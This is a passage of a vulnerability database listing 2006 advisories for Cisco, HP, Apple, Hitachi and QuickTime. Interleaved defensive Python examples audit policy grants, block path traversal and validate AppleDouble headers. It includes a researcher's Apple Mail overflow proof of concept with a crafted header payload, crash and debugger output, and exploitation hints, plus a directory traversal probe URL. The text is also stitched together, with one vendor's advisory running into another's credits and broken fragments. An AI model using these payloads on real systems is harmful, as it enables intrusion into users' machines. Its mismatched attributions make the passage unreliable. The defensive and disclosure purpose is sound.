* Cisco ONS 15100 Series
* Cisco ONS 15200 Series
* Cisco ONS 15302, ONS 15305, and ONS 15310-MA platforms
* Cisco ONS 15500 Series
* Cisco ONS 15800 Series
5) A vulnerability exists within the Cisco Transport Controller (CTC)
applet launcher, which is downloaded each time a management connection
is made to the Optical node. The vulnerability is caused by the
java.policy permissions being too broad: all permissions are granted to
any software originating from the codeBase or source at
http://*/fs/LAUNCHER.jar.
This can be exploited to execute arbitrary code on the CTC
workstation if it is used to connect to a malicious web site running
Java code from the "/fs/LAUNCHER.jar" location.
The vulnerability affects versions 4.0.x and prior.
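The CTC launcher grant described in item 5 here (and in the identical item 5 of the CVE-2006-1672 entry above) is a policy-file defect that can be caught by inspection. The following is an added example, not code from Cisco, Secunia or the CTC installer: it parses the grant blocks of a java.policy file and reports every grant of java.security.AllPermission whose codeBase host is a wildcard or absent. The policy text is constructed for the example; its first grant mirrors the advisory's entry, the host ons-node.example.internal in the narrow replacement grant is an assumed placeholder, and the other two grants are ordinary ones included so the check has something to leave alone. The audit goes slightly beyond the single entry the advisory names by checking every grant in the file.

```python
"""Audit java.policy grant blocks for over-broad AllPermission grants.

Added example for this page; it is not code from Cisco, Secunia or the
CTC installer. SAMPLE_POLICY is constructed: its first grant mirrors the
entry the advisory describes, the third is a narrow replacement pinned
to an assumed placeholder host, and the rest are ordinary grants.
"""
import re

SAMPLE_POLICY = '''
grant codeBase "http://*/fs/LAUNCHER.jar" {
    permission java.security.AllPermission;
};

grant codeBase "file:/usr/lib/jvm/lib/ext/*" {
    permission java.security.AllPermission;
};

grant codeBase "https://ons-node.example.internal/fs/LAUNCHER.jar" {
    permission java.net.SocketPermission "ons-node.example.internal:1024-", "connect";
};

grant {
    permission java.util.PropertyPermission "java.version", "read";
};
'''

GRANT_RE = re.compile(r'grant\b([^{]*)\{(.*?)\}\s*;', re.DOTALL)
CODEBASE_RE = re.compile(r'codeBase\s+"([^"]*)"', re.IGNORECASE)
PERM_RE = re.compile(r'permission\s+([\w.$]+)')
URL_RE = re.compile(r'^([A-Za-z][\w+.-]*):(?://([^/]*))?')
ALL_PERMISSION = "java.security.AllPermission"


def parse_grants(policy_text):
    """Return [{'codeBase': str or None, 'permissions': [class, ...]}, ...]."""
    grants = []
    for match in GRANT_RE.finditer(policy_text):
        header, body = match.group(1), match.group(2)
        codebase = CODEBASE_RE.search(header)
        grants.append({
            "codeBase": codebase.group(1) if codebase else None,
            "permissions": PERM_RE.findall(body),
        })
    return grants


def codebase_host(codebase):
    """Split a codeBase URL into (scheme, host); host is '' when absent."""
    match = URL_RE.match(codebase)
    if not match:
        return None, ""
    netloc = match.group(2) or ""
    host = netloc.rsplit("@", 1)[-1].split(":", 1)[0]   # drop userinfo, port
    return match.group(1).lower(), host.lower()


def is_unbounded_codebase(codebase):
    """True when the grant applies to code from any network origin.

    Java's CodeSource treats a host beginning with '*' as a wildcard, so
    '*' alone matches every host. A grant with no codeBase applies to all
    code. file: URLs name local code and are not the remote-load case.
    """
    if codebase is None:
        return True
    scheme, host = codebase_host(codebase)
    if scheme == "file":
        return False
    return host == "" or host.startswith("*")


def audit(policy_text):
    """codeBase of every grant that hands AllPermission to an unbounded origin."""
    return [g["codeBase"] for g in parse_grants(policy_text)
            if ALL_PERMISSION in g["permissions"]
            and is_unbounded_codebase(g["codeBase"])]


if __name__ == "__main__":
    for codebase in audit(SAMPLE_POLICY):
        print("over-broad AllPermission grant for codeBase:", codebase)
```

Run against a workstation's java.policy (and the user's .java.policy), the only grant this should report is the one the advisory describes; the fix shape is the third grant above, which pins the launcher to the node's own host and hands out only the socket permission the applet needs.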
SOLUTION:
1-4) Updated versions are available (see patch matrix in vendor
advisory).
PROVIDED AND/OR DISCOVERED BY:
Reported by vendor.
ORIGINAL ADVISORY:
http://www.cisco.com/warp/public/707/cisco-sa-20060405-ons.shtml
----------------------------------------------------------------------
VAR-200604-0081 | CVE-2006-1654 | HP Color LaserJet 2500/4600 Toolbox Directory Traversal Vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Directory traversal vulnerability in the HP Color LaserJet 2500 Toolbox and Color LaserJet 4600 Toolbox on Microsoft Windows before 20060402 allows remote attackers to read arbitrary files via a .. (dot dot) in an HTTP GET request to TCP port 5225. This issue is due to a failure in the application to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to retrieve arbitrary files from the vulnerable system in the context of the affected application. Information obtained may aid attackers in further attacks.
The vulnerability is caused due to an input validation error in the
built-in HTTP server. This can be exploited to disclose the contents
of arbitrary files via directory traversal attacks.
Example:
http://[host]:5225/../../../[file]
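The traversal above works because the request path is joined onto the document root as-is. The following is an added example, not HP's Toolbox code and not part of the advisory, showing that naive join beside a resolver that rejects traversal before touching the filesystem. DOC_ROOT is an assumed placeholder (the Toolbox's real web root is not published), and backslashes are treated as separators because the affected Toolbox runs on Windows, where both forms work. It goes beyond the single probe in the advisory by also handling URL-encoded and double-encoded dot segments and NUL bytes.

```python
"""Resolve an HTTP request path inside a document root without traversal.

Added example for this page; it is not HP's Toolbox code and not part of
the advisory. DOC_ROOT is an assumed placeholder, since the Toolbox's
real web root is not published. Backslashes are treated as separators
because the affected Toolbox runs on Windows, where both forms work.
"""
import posixpath
from urllib.parse import unquote

DOC_ROOT = "/opt/hp/toolbox/www"   # assumed placeholder


def naive_resolve(root, request_path):
    """The defect the advisory describes: the request path is appended to
    the document root and '..' segments walk out of it."""
    return posixpath.normpath(root + "/" + request_path.lstrip("/"))


def safe_resolve(root, request_path):
    """Return the file path to serve, or None when the request is rejected."""
    # Decode twice so that %2e%2e and %252e%252e both surface as '..'.
    decoded = unquote(unquote(request_path))
    if "\x00" in decoded:
        return None                         # NUL would truncate a C path
    decoded = decoded.replace("\\", "/")     # Windows accepts both separators
    parts = [p for p in decoded.split("/") if p not in ("", ".")]
    if any(p == ".." for p in parts):
        return None                         # traversal attempt: refuse, do not "fix"
    root = posixpath.normpath(root)
    candidate = posixpath.normpath(posixpath.join(root, *parts)) if parts else root
    # Belt and braces: whatever we computed must still lie under root.
    if candidate != root and not candidate.startswith(root + "/"):
        return None
    return candidate


if __name__ == "__main__":
    # The advisory's probe shape, encoded variants, then a legitimate request.
    for path in ("/../../../windows/win.ini", "/..%2f..%2f..%2fwindows/win.ini",
                 "/%252e%252e/%252e%252e/win.ini", "/index.html"):
        print("%-36s naive=%-28s safe=%s" % (path, naive_resolve(DOC_ROOT, path),
                                              safe_resolve(DOC_ROOT, path)))
```

Refusing a request that contains '..' (rather than normalising it away) is deliberate: a silently "fixed" path hides the probe from logs, and the rejected request is exactly what an IDS rule for port 5225 should key on.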
SOLUTION:
Update to version 3.1.
----------------------------------------------------------------------
VAR-200604-0468 | CVE-2006-0401 | Apple Mac OS X Firmware Password Bypass Vulnerability |
CVSS V2: 4.6 CVSS V3: - Severity: MEDIUM |
Unspecified vulnerability in Mac OS X before 10.4.6, when running on an Intel-based computer, allows attackers with physical access to bypass the firmware password and log on in Single User Mode via unspecified vectors. Mac OS X running on Intel-based Macintosh computers is prone to an authentication-bypass vulnerability.
SOLUTION:
Update to version 10.4.6.
http://www.apple.com/support/downloads/
PROVIDED AND/OR DISCOVERED BY:
The vendor credits David Pugh, University of Michigan.
ORIGINAL ADVISORY:
Apple:
http://docs.info.apple.com/article.html?artnum=303567
----------------------------------------------------------------------
VAR-200604-0420 | CVE-2006-1609 | Hitachi XFIT/S Unspecified Denial of Service Vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Unspecified vulnerability in Hitachi XFIT/S, XFIT/S/JCA, XFIT/S/ZGN, and XFIT/S ZENGIN TCP/IP Procedure allows remote attackers to cause a denial of service (server process and transfer control process stop) when the products "receive data unexpectedly". Hitachi XFIT/S, XFIT/S/JCA, XFIT/S/ZGN, and XFIT/S ZENGIN TCP/IP Procedure contain an unspecified vulnerability that stops the server process and the transfer control process. XFIT/S is prone to a denial-of-service vulnerability.
The vulnerability presents itself when the application receives data unexpectedly.
Due to a lack of details, further information cannot be provided at the moment. This BID will be updated when more details become available.
VAR-200604-0404 | CVE-2006-1574 | Hitachi Groupmax Desktop for Scheduler World Wide Web Unknown Cross-Site Scripting Attack Vulnerability |
CVSS V2: 5.8 CVSS V3: - Severity: MEDIUM |
Cross-site scripting (XSS) vulnerability in Groupmax World Wide Web, World Wide Web Desktop, World Wide Web for Scheduler, and Desktop for Scheduler, allows remote attackers to inject arbitrary web script or HTML via unknown attack vectors. This issue is due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
VAR-200603-0199 | CVE-2006-1532 | PHP Classifieds Search.PHP Cross-Site Scripting Vulnerability |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Cross-site scripting (XSS) vulnerability in search.php in PHP Classifieds 6.18, 6.20, and possibly other versions, allows remote attackers to inject arbitrary web script or HTML via the searchword parameter. This issue is due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Input passed to the "searchword" parameter in "search.php" isn't
properly sanitised before being returned to the user.
SOLUTION:
Edit the source code to ensure that input is properly sanitised.
PROVIDED AND/OR DISCOVERED BY:
Preddy, RootShell Security Group
----------------------------------------------------------------------
VAR-200603-0287 | CVE-2006-1357 | F5 Firepass 4100 SSL VPN Cross-Site Scripting Vulnerability |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Cross-site scripting (XSS) vulnerability in my.support.php3 in F5 Firepass 4100 SSL VPN 5.4.2 allows remote attackers to inject arbitrary web script or HTML via the s parameter. This issue is due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.
Input passed to the "s" parameter in "my.support.php3" isn't properly
sanitised before being returned to the user. Other versions may also be affected.
SOLUTION:
Do not follow links from untrusted sources or visit untrusted web
sites while being logged in to the VPN.
PROVIDED AND/OR DISCOVERED BY:
ILION Research Labs
----------------------------------------------------------------------
VAR-200603-0271 | CVE-2006-0400 | Apple Mail buffer overflow vulnerability |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
CoreTypes in Apple Mac OS X 10.4 up to 10.4.5 allows remote attackers to bypass the same-origin policy and execute JavaScript in other domains via unknown vectors involving "crafted archives". Apple Mail contains a buffer overflow that may allow a remote attacker to execute arbitrary code on a vulnerable system. Apple Safari is susceptible to a same-origin policy violation. This issue is due to the application's failure to properly enforce the same-origin policy for JavaScript remote data access.
An attacker may create a malicious webpage that can access the properties of another domain. This may lead to disclosure of sensitive information or may facilitate other attacks against a user of the browser. Safari is the web browser bundled with Apple's family of operating systems. Under certain circumstances, a maliciously crafted document can bypass these same-origin restrictions and execute arbitrary code in the user's browser.
VAR-200603-0281 | CVE-2006-0396 | Apple Mac OS X Mail Message Attachment Remote Buffer Overflow Vulnerability |
CVSS V2: 5.1 CVSS V3: - Severity: MEDIUM |
Buffer overflow in Mail in Apple Mac OS X 10.4 up to 10.4.5, when patched with Security Update 2006-001, allows remote attackers to execute arbitrary code via a long Real Name value in an e-mail attachment sent in AppleDouble format, which triggers the overflow when the user double-clicks on an attachment. Mac OS X Mail is prone to a remote buffer-overflow vulnerability. This issue is due to a failure in the application to do proper bounds checking on user-supplied data before using it in a finite-sized buffer. A successful exploit may facilitate a compromise of the underlying computer.
This issue is present in Apple Mail when 'Security Update 2006-001' is applied. An attacker can trigger this vulnerability by sending a specially crafted MIME-encapsulated Macintosh file containing an AppleDouble header. Download Validation is used to warn the user if the file type is not "safe". Prior
to 2006-001 certain techniques could be used to disguise a file's type so that the validation
was bypassed. Unfortunately in the process of patching the previous problem a new one was
introduced.
After applying Security Update 2006-001, Mail.app becomes vulnerable to a buffer overflow that
may be triggered via a properly formatted MIME-encapsulated Macintosh file. Sending a file in
the AppleDouble format with a long Real Name entry will invoke the overflow. Reading through
RFC 1740 should provide enough information to trigger the issue. The overflow is triggered
by the file that contains the AppleDouble header information.
The format of the header we need to send is as follows:
[4 byte magic num][4 byte version num][16 bytes of filler][2 byte num of entries][Entry...]
Entry descriptor for each Entry:
[4 byte entry id][4 byte offset][4 byte length]
Using the above layout we come up with the following code snippet for our exploit.
"\x00\x05\x16\x07". # AppleDouble Magic Number
"\x00\x02\x00\x00". # Version 2
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". # 16 Bytes of filler
"\x00\x03\x00\x00". # Number of entries (3)
"\x00\x09\x00\x00". # Entry ID 9 is for 'Finder Info'
"\x00\x3e\x00\x00". # Start of Finder Info data is at file offset 0x3e
"\x00\x0a\x00\x00". # Length of Finder Info is 0x0a or 10
"\x00\x03\x00\x00". # Entry ID 3 is for 'Real Name'
"\x00\x48\x00\x00". # Start of Real Name data is at file offset 0x48
"\x00\xf5\x00\x00". # Length of Real Name is 0xf5 or 245
"\x00\x02\x00\x00". # Entry ID 2 is for 'Resource Fork'
"\x01\x3d\x00\x00". # Start of Resource Fork is at file offset 0x013d
"\x05\x3a\x00\x00". # Length of Resource fork is 0x053a
"\x00\x00\x00\x00". # <null> filler
"\x00\x00\x00\x00". # <null> filler
"A" x 226 . "$retaddr" x 3 . "zzz.mov." . # remember this length is hard coded above.
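The header layout above is simple enough that the consumer-side checks Mail.app was missing can be shown directly. The following is an added example, not Apple's code and not the advisory author's exploit: it serialises the same header shape (magic, version, filler, entry count, then 12-byte entry descriptors) with Python's struct module, and parses it back the way a careful consumer should, refusing any entry whose offset or length points outside the file and any Real Name that would not fit its buffer or that violates the 7-bit printable rule the advisory cites from RFC 1740. MAX_REAL_NAME is an assumed cap: the advisory says a long Real Name overflows a fixed buffer but does not give its size. The sample inputs are constructed; the hostile one has the advisory's 245-byte Real Name with placeholder bytes, not a return address.

```python
"""Build and defensively parse an AppleDouble header (RFC 1740 layout).

Added example for this page. It is not Apple's code and not the
advisory author's exploit; it rebuilds the same header shape with the
struct module and then parses it the way a consumer such as Mail.app
should, refusing entries that point outside the file and a Real Name
that will not fit its buffer. MAX_REAL_NAME is an assumed cap: the
advisory says a long Real Name overflows a fixed buffer but not its size.
"""
import struct

APPLEDOUBLE_MAGIC = 0x00051607
APPLEDOUBLE_VERSION = 0x00020000
ENTRY_RESOURCE_FORK = 2
ENTRY_REAL_NAME = 3
ENTRY_FINDER_INFO = 9
HEADER_FMT = ">II16sH"                      # magic, version, filler, entry count
ENTRY_FMT = ">III"                          # entry id, offset, length
HEADER_SIZE = struct.calcsize(HEADER_FMT)   # 26 bytes
ENTRY_SIZE = struct.calcsize(ENTRY_FMT)     # 12 bytes
MAX_REAL_NAME = 64                          # assumed size of the name buffer


class AppleDoubleError(ValueError):
    """Raised for any header the parser refuses to trust."""


def build_appledouble(entries):
    """Serialise [(entry_id, payload_bytes), ...] with payloads laid out in
    order straight after the entry table, as the advisory's snippet does."""
    offset = HEADER_SIZE + ENTRY_SIZE * len(entries)
    table, data = b"", b""
    for entry_id, payload in entries:
        table += struct.pack(ENTRY_FMT, entry_id, offset, len(payload))
        data += payload
        offset += len(payload)
    header = struct.pack(HEADER_FMT, APPLEDOUBLE_MAGIC, APPLEDOUBLE_VERSION,
                         b"\0" * 16, len(entries))
    return header + table + data


def patch_entry(blob, index, field, value):
    """Copy of blob with one entry-table field (0=id, 1=offset, 2=length)
    overwritten; used to construct hostile inputs."""
    buf = bytearray(blob)
    struct.pack_into(">I", buf, HEADER_SIZE + ENTRY_SIZE * index + 4 * field, value)
    return bytes(buf)


def parse_appledouble(blob, max_name=MAX_REAL_NAME):
    """Return {entry_id: payload}. Offsets and lengths come from the file,
    so every one is checked against the file size before it is used."""
    if len(blob) < HEADER_SIZE:
        raise AppleDoubleError("truncated header")
    magic, version, _filler, count = struct.unpack_from(HEADER_FMT, blob, 0)
    if magic != APPLEDOUBLE_MAGIC:
        raise AppleDoubleError("bad magic 0x%08x" % magic)
    if version != APPLEDOUBLE_VERSION:
        raise AppleDoubleError("unsupported version 0x%08x" % version)
    table_end = HEADER_SIZE + ENTRY_SIZE * count
    if table_end > len(blob):
        raise AppleDoubleError("entry table runs past end of file")
    entries = {}
    for i in range(count):
        entry_id, offset, length = struct.unpack_from(
            ENTRY_FMT, blob, HEADER_SIZE + ENTRY_SIZE * i)
        # Compare length against the bytes left after offset rather than
        # forming offset + length, which is the sum that wraps in a C parser.
        if offset < table_end or offset > len(blob) or length > len(blob) - offset:
            raise AppleDoubleError(
                "entry %d (id %d) lies outside the file" % (i, entry_id))
        payload = blob[offset:offset + length]
        if entry_id == ENTRY_REAL_NAME:
            if length > max_name:
                raise AppleDoubleError(
                    "Real Name length %d exceeds %d-byte buffer" % (length, max_name))
            # The advisory reads RFC 1740 as limiting the name to printable ASCII.
            if any(b < 0x20 or b > 0x7e for b in payload):
                raise AppleDoubleError("Real Name is not 7-bit printable ASCII")
        entries[entry_id] = payload
    return entries


def validate(blob, max_name=MAX_REAL_NAME):
    """None when blob parses cleanly, otherwise the rejection reason."""
    try:
        parse_appledouble(blob, max_name)
    except AppleDoubleError as exc:
        return str(exc)
    return None


if __name__ == "__main__":
    # Constructed inputs: a benign attachment and one shaped like the advisory's.
    benign = build_appledouble([(ENTRY_FINDER_INFO, b"\0" * 10),
                                (ENTRY_REAL_NAME, b"report.mov")])
    hostile = build_appledouble([(ENTRY_FINDER_INFO, b"\0" * 10),
                                 (ENTRY_REAL_NAME, b"A" * 237 + b"zzz.mov."),
                                 (ENTRY_RESOURCE_FORK, b"\0" * 0x53a)])
    print("benign :", validate(benign))
    print("hostile:", validate(hostile))
```

The length check against the remaining bytes, instead of against offset + length, is the part worth copying into a C parser: with 32-bit offsets an attacker can pick an offset and length whose sum wraps back inside the file while the slice itself runs far past it.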
If a message with the above header arrived in your inbox on Mail.app you would see only the
first 11 characters of the name provided by the Real Name entry. In this particular case you
see "AAAAAAAAAAA...mov". Other examples could be "SuperTastey...mov" or "NakedChicks...mov".
The visual aspects of the (...) are surprisingly not that suspicious.
Upon double clicking the attached file on the arrived email the following dump is created.
Date/Time: 2006-03-04 10:35:32.472 -0500
OS Version: 10.4.5 (Build 8H14)
Report Version: 4
Command: Mail
Path: /Applications/Mail.app/Contents/MacOS/Mail
Parent: WindowServer [64]
Version: 2.0.7 (746.2)
Build Version: 1
Project Name: MailViewer
Source Version: 7460200
PID: 271
Thread: 0
Exception: EXC_BAD_ACCESS (0x0001)
Codes: KERN_INVALID_ADDRESS (0x0001) at 0x41414140
If we take a look at this in gdb we can see that several things are overwritten.
(gdb) bt
#0 0x41424344 in ?? ()
Cannot access memory at address 0x41424344
Cannot access memory at address 0x31313131
Cannot access memory at address 0x41424344
Cannot access memory at address 0x41424344
#1 0x41424344 in ?? ()
Cannot access memory at address 0x41424344
Cannot access memory at address 0x41424344
Cannot access memory at address 0x31313131
warning: Previous frame identical to this frame (corrupt stack?)
Cannot access memory at address 0x41424344
Cannot access memory at address 0x41424344
Cannot access memory at address 0x31313139
We control r0, pc, lr and half of r31.
(gdb) i r $r0 $pc $lr $r31
r0 0x41424344 1094861636
pc 0x41424344 1094861636
lr 0x41424344 1094861636
r31 0x18b3030 25899056
Exploitation of this issue seems possible however there are currently some limitations
with regard to what can and can not be done.
The first issue involves previous exploitation attempts and the temporary files left
behind by such attempts.
k-fs-ibook:~ test$ ls -al /var/tmp/folders.502/TemporaryItems/ ~/Library/Mail\ Downloads/
/Users/test/Library/Mail Downloads/:
total 352
drwx------ 7 test admin 238 Mar 13 22:42 .
drwx------ 23 test admin 782 Mar 12 15:52 ..
drwx------ 3 test admin 102 Mar 13 22:42 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa0000
11112222ABCD3333zzz.mov.mailhold
/var/tmp/folders.502/TemporaryItems/:
total 352
drwxr-xr-x 4 test wheel 136 Mar 13 22:38 .
drwx------ 3 test wheel 102 Mar 12 10:35 ..
-rwxr-xr-x 1 test wheel 90000 Mar 13 22:44 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa00001
1112222ABCD3333zzz.mov.mov
The existence of a particular temporary file can halt the actions of an exploit attempting
to take advantage of this issue. While developing an exploit, keeping the two folders shown
above clean is critical! The temporary files appear to be created during the process of
previewing a message. In some cases they may not be created due to failed mkstemp() calls.
The next issue centers around the fact that RFC 1740 states that the Real Name entry can
only contain 7-bit printable ASCII, so using shellcode addresses containing 0xff and 0xbf
will not be possible. This unfortunately eliminates a lot of easy shellcode addresses.
0xbfffe6e1: "Users/test/Library/Mail Downloads/", 'a' <repeats 166 times>...
0xbfffe7a9: 'a' <repeats 52 times>, "00\032\xff\xf8"
Code in other areas seems to be either in an unreliable location or in a unicode format.
I am really not in the mood to hunt around memory for a stable address but I am sure that
something could be put together to exploit this.
Here is an example of the Unicode strings that can be found in memory at random places.
(gdb) x/30a $r29
0x18b8a00: 0xa28e6424 0x12100000 0x2f0055 0x730065
0x18b8a10: 0x720073 0x2f0074 0x650073 0x74002f
0x18b8a20: 0x4c0069 0x620072 0x610072 0x79002f
0x18b8a30: 0x4d0061 0x69006c 0x200044 0x6f0077
0x18b8a40: 0x6e006c 0x6f0061 0x640073 0x2f0061
0x18b8a50: 0x610061 0x610061 0x610061 0x610061
0x18b8a60: 0x610061 0x610061 0x610061 0x610061
0x18b8a70: 0x610061 0x610061
On x86 the Unicode *may* not be a problem however I do not have access to an intel based
mac so I can not confirm this. On PowerPC however for the time being there is not much
I can do on the Unicode front. I am not aware of any Venetian style PowerPC lovin at the
moment.
For the time being my exploitation has not gone beyond what I have documented here. Beyond
the few hurdles I have outlined may lie a few more, but who knows? Good luck.
Work Around:
Install 2006-002 update or simply do not open attachments in Mail.app
http://www.apple.com/support/downloads/
Sidenote:
Much thanks to Apple for the quick turnaround time and prompt weekend responses! A same
day response and 9 day turnaround is hard to beat.
VAR-200603-0472 | CVE-2006-1249 | Apple QuickTime FlashPix integer overflow |
CVSS V2: 6.8 CVSS V3: - Severity: MEDIUM |
Integer overflow in Apple QuickTime Player 7.0.3 and 7.0.4 and iTunes 6.0.1 and 6.0.2 allows remote attackers to execute arbitrary code via a FlashPix (FPX) image that contains a field that specifies a large number of blocks. Apple QuickTime fails to properly handle FlashPix images. This vulnerability may allow a remote, unauthenticated attacker to execute arbitrary code or cause a denial of service condition. Two vulnerabilities have been reported in Apple QuickTime and iTunes:
- an integer overflow
- a heap-based buffer overflow
These issues affect both Mac OS X and Microsoft Windows releases of the software.
A successful exploit will result in the execution of arbitrary code in the context of the currently logged-in user. Apple QuickTime is a popular multimedia player that supports a wide variety of media formats. An attacker
could exploit these vulnerabilities by convincing a user to access
a specially crafted image or media file with a vulnerable version
of QuickTime. Since QuickTime configures most web browsers to
handle QuickTime media files, an attacker could exploit these
vulnerabilities using a web page.
For more information, please refer to the Vulnerability Notes.
II. For further information,
please see the Vulnerability Notes.
III.
Disable QuickTime in your web browser
An attacker may be able to exploit this vulnerability by persuading
a user to access a specially crafted file with a web
browser. Disabling QuickTime in your web browser will defend
against this attack vector. For more information, refer to the
Securing Your Web Browser document.
Appendix A. Please send
email to <cert@cert.org> with "TA06-132B Feedback VU#289705" in the
subject.
Produced 2006 by US-CERT, a government organization.
Terms of use:
<http://www.us-cert.gov/legal.html>
____________________________________________________________________
Revision History
May 12, 2006: Initial release
____________________________________________________________________
McAfee, Inc.
McAfee Avert Labs Security Advisory
Public Release Date: 2006-05-11
Apple QuickDraw/QuickTime Multiple Vulnerabilities
CVE-2006-1249, CVE-2006-1453, CVE-2006-1454, CVE-2006-1459, CVE-2006-1460, CVE-2006-1461, CVE-2006-1462, CVE-2006-1464, CVE-2006-1465
______________________________________________________________________
* Synopsis
Apple QuickTime and Apple QuickDraw are multimedia technologies used to process image, audio and video data.
Two code execution vulnerabilities are present in QuickDraw PICT image format support.
Twenty-one code execution vulnerabilities are present in QuickTime support for various multimedia formats including MOV, H.264, MPEG-4, AVI, FPX and SWF. For an attack to succeed, user interaction is required, and therefore the risk factor for these issues is medium.
CVE-2006-1459
Seven integer overflow vulnerabilities are present in QuickTime MOV video format support.
CVE-2006-1460
Five buffer overflow vulnerabilities are present in QuickTime MOV video format support.
CVE-2006-1461
Two buffer overflow vulnerabilities are present in QuickTime Flash (SWF) support.
CVE-2006-1462
Three integer overflow vulnerabilities are present in QuickTime H.264 (M4V) video format support.
CVE-2006-1464
One buffer overflow vulnerability is present in QuickTime MPEG4 (M4P) video format support.
CVE-2006-1465
One buffer overflow vulnerability is present in QuickTime AVI video format support.
______________________________________________________________________
* Legal Notice
Copyright (C) 2006 McAfee, Inc.
The information contained within this advisory is provided for the convenience of McAfee's customers, and may be redistributed provided that no fee is charged for distribution and that the advisory is not modified in any way. McAfee makes no representations or warranties regarding the accuracy of the information referenced in this document, or the suitability of that information for your purposes.
McAfee, Inc. and/or its affiliated companies in the United States and/or other Countries. All other registered and unregistered trademarks in this document are the sole property of their respective owners.
______________________________________________________________________
Technical Description:
In an FPX file, a field specifies how many blocks of data the file
contains. Each block is 0x200 bytes, and QuickTime Player allocates
memory based on (number * 0x200) without checking the size value, so
the multiplication can overflow. Setting the block count to 0x800000
makes the product wrap in 32-bit arithmetic, so a far smaller buffer is
allocated than the data that is then written into it, which causes a
heap overflow and writes to invalid memory.
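The arithmetic of that overflow, and the guard that prevents it, as an added example that is not Apple's QuickTime code and not eEye's. The 32-bit multiplication is emulated with a mask so the wrap-around is visible on any host; HEAP_LIMIT is an assumed sanity cap, not a value from the advisory. It generalises the single 0x800000 case to the usual pattern of a trusted element count times a fixed element size.

```python
"""Block-count allocation guard for a 32-bit parser, as in the FPX case.

Added example for this page; not Apple's QuickTime code and not eEye's.
It emulates the 32-bit multiplication so the wrap-around the advisory
describes is visible on any host, and shows the guard a parser needs.
HEAP_LIMIT is an assumed sanity cap, not a value from the advisory.
"""
BLOCK_SIZE = 0x200
U32_MAX = 0xFFFFFFFF
HEAP_LIMIT = 64 * 1024 * 1024     # assumed: largest image buffer accepted


def vulnerable_alloc_size(num_blocks):
    """What 32-bit `num_blocks * 0x200` yields: the product is truncated."""
    return (num_blocks * BLOCK_SIZE) & U32_MAX


def bytes_copied(num_blocks):
    """The copy loop trusts the same count, so it writes the full product."""
    return num_blocks * BLOCK_SIZE


def overflow_excess(num_blocks):
    """Bytes written past a wrapped allocation (0 when nothing wraps)."""
    return max(0, bytes_copied(num_blocks) - vulnerable_alloc_size(num_blocks))


def checked_alloc_size(num_blocks, limit=HEAP_LIMIT):
    """Size to allocate, or None if the count cannot be honoured safely.

    Dividing the ceiling by the block size cannot overflow, unlike the
    multiplication; the second test caps what we are willing to allocate
    even when the product fits in 32 bits.
    """
    if num_blocks < 0 or num_blocks > U32_MAX // BLOCK_SIZE:
        return None
    size = num_blocks * BLOCK_SIZE
    if size > limit:
        return None
    return size


if __name__ == "__main__":
    for count in (16, 0x7FFFFF, 0x800000, 0x800001):
        print("blocks=%#x wrapped=%#x excess=%#x checked=%s" % (
            count, vulnerable_alloc_size(count), overflow_excess(count),
            checked_alloc_size(count)))
```

For 0x800000 blocks the wrapped size is exactly 0, so the allocator hands back a minimal chunk and the copy loop then writes 4 GiB past it; 0x800001 wraps to 0x200, a single block, with the same result. The divide-before-multiply test rejects both, and the limit rejects counts such as 0x7FFFFF whose product fits in 32 bits but is still absurd for an image.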
QuickTime: QuickTime File Format
http://developer.apple.com/documentation/QuickTime/QTFF/index.html
Protection:
Retina Network Security Scanner has been updated to identify this
vulnerability.
Blink - Endpoint Vulnerability Prevention - preemptively protects from
this vulnerability.
Vendor Status:
Apple has released a patch for this vulnerability information is
available at http://docs.info.apple.com/article.html?artnum=61798
Credit:
Discovery: Fang Xing
Copyright (c) 1998-2006 eEye Digital Security Permission is hereby
granted for the redistribution of this alert electronically. It is not
to be edited in any way without express consent of eEye. If you wish to
reprint the whole or any part of this alert in any other medium
excluding electronic medium, please email alert@eEye.com for permission.
Disclaimer
The information within this paper may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There
are no warranties, implied or express, with regard to this information.
In no event shall the author be liable for any direct or indirect
damages whatsoever arising out of or in connection with the use or
spread of this information.
TITLE:
QuickTime Multiple Code Execution Vulnerabilities
SECUNIA ADVISORY ID:
SA20069
VERIFY ADVISORY:
http://secunia.com/advisories/20069/
CRITICAL:
Highly critical
IMPACT:
DoS, System access
WHERE:
From remote
SOFTWARE:
Apple Quicktime 4.x
http://secunia.com/product/7923/
Apple Quicktime 5.x
http://secunia.com/product/215/
Apple Quicktime 6.x
http://secunia.com/product/810/
Apple QuickTime 7.x
http://secunia.com/product/5090/
DESCRIPTION:
Multiple vulnerabilities have been reported in QuickTime, which can
be exploited by malicious people to compromise a user's system.
3) A boundary error within the processing of Flash movies can be
exploited via a specially crafted Flash movie to crash the
application and potentially execute arbitrary code.
4) An integer overflow and boundary error within the processing of
